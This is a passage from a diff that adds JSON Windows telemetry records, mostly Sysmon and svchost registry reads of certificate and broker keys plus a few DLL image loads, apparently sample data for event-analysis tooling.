"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571691830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883571691830000, + 
"unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 780, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\system32\\svchost.exe", + "registry_key": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events", + "registry_path": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events\\{159788d7-8d9e-418e-b43b-2edcf23cab7f}", + "registry_value": "{159788d7-8d9e-418e-b43b-2edcf23cab7f}", + "timestamp": 131883571691830000, + "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" + }, + { + "event_type": "registry", + "pid": 780, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\system32\\svchost.exe", + "registry_key": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events\\{159788d7-8d9e-418e-b43b-2edcf23cab7f}", + "registry_path": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events\\{159788d7-8d9e-418e-b43b-2edcf23cab7f}\\BrokerId", + "registry_value": "BrokerId", + "timestamp": 131883571691830000, + "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" + }, + { + "event_type": "registry", + "pid": 780, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\system32\\svchost.exe", + "registry_key": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events\\{159788d7-8d9e-418e-b43b-2edcf23cab7f}", + "registry_path": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events\\{159788d7-8d9e-418e-b43b-2edcf23cab7f}\\EventParameters", + "registry_value": "EventParameters", + "timestamp": 131883571691830000, + "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" + }, + { + "event_type": "registry", + "pid": 780, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\system32\\svchost.exe", + "registry_key": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events\\{159788d7-8d9e-418e-b43b-2edcf23cab7f}", + "registry_path": 
"\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events\\{159788d7-8d9e-418e-b43b-2edcf23cab7f}\\Flags", + "registry_value": "Flags", + "timestamp": 131883571691830000, + "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" + }, + { + "event_type": "registry", + "pid": 780, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\system32\\svchost.exe", + "registry_key": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events\\{159788d7-8d9e-418e-b43b-2edcf23cab7f}", + "registry_path": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events\\{159788d7-8d9e-418e-b43b-2edcf23cab7f}\\PackageFullName", + "registry_value": "PackageFullName", + "timestamp": 131883571691830000, + "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" + }, + { + "event_type": "registry", + "pid": 780, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\system32\\svchost.exe", + "registry_key": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events\\{159788d7-8d9e-418e-b43b-2edcf23cab7f}", + "registry_path": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events\\{159788d7-8d9e-418e-b43b-2edcf23cab7f}\\UserSid", + "registry_value": "UserSid", + "timestamp": 131883571691830000, + "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" + }, + { + "event_type": "image_load", + "image_name": "Windows.Storage.ApplicationData.dll", + "image_path": "C:\\Windows\\System32\\Windows.Storage.ApplicationData.dll", + "pid": 6376, + "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", + "timestamp": 131883571691520000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": 
"Disallowed", + "timestamp": 131883571691830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571691830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571691830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571691830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571691830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571691830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571691830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571691830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571691830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 
131883571691830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571691830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571691830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571691830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571691830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571691830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571691830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571691830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571691830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571691830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": 
"Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571691830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571691830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571691830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571691830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + 
"registry_value": "Software Publishing", + "timestamp": 131883571691830000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 780, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\system32\\svchost.exe", + "registry_key": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events", + "registry_path": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events\\{894f95b7-467e-4aba-b832-df7be656ba28}", + "registry_value": "{894f95b7-467e-4aba-b832-df7be656ba28}", + "timestamp": 131883571691990000, + "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" + }, + { + "event_type": "registry", + "pid": 780, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\system32\\svchost.exe", + "registry_key": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events\\{894f95b7-467e-4aba-b832-df7be656ba28}", + "registry_path": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events\\{894f95b7-467e-4aba-b832-df7be656ba28}\\BrokerId", + "registry_value": "BrokerId", + "timestamp": 131883571691990000, + "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" + }, + { + "event_type": "registry", + "pid": 780, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\system32\\svchost.exe", + "registry_key": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events\\{894f95b7-467e-4aba-b832-df7be656ba28}", + "registry_path": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events\\{894f95b7-467e-4aba-b832-df7be656ba28}\\EventParameters", + "registry_value": "EventParameters", + "timestamp": 131883571691990000, + "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" + }, + { + "event_type": "registry", + "pid": 780, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\system32\\svchost.exe", + "registry_key": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events\\{894f95b7-467e-4aba-b832-df7be656ba28}", + "registry_path": 
"\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events\\{894f95b7-467e-4aba-b832-df7be656ba28}\\Flags", + "registry_value": "Flags", + "timestamp": 131883571691990000, + "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" + }, + { + "event_type": "registry", + "pid": 780, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\system32\\svchost.exe", + "registry_key": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events\\{894f95b7-467e-4aba-b832-df7be656ba28}", + "registry_path": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events\\{894f95b7-467e-4aba-b832-df7be656ba28}\\PackageFullName", + "registry_value": "PackageFullName", + "timestamp": 131883571691990000, + "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" + }, + { + "event_type": "registry", + "pid": 780, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\system32\\svchost.exe", + "registry_key": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events\\{894f95b7-467e-4aba-b832-df7be656ba28}", + "registry_path": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events\\{894f95b7-467e-4aba-b832-df7be656ba28}\\UserSid", + "registry_value": "UserSid", + "timestamp": 131883571691990000, + "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" + }, + { + "event_type": "image_load", + "image_name": "logoncli.dll", + "image_path": "C:\\Windows\\System32\\logoncli.dll", + "pid": 6376, + "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", + "timestamp": 131883571691520000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571691990000, + 
"unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571691990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571691990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571691990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571691990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571691990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571691990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571691990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571691990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 
131883571691990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571691990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571691990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571691990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571691990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571691990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571691990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571691990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571691990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571691990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": 
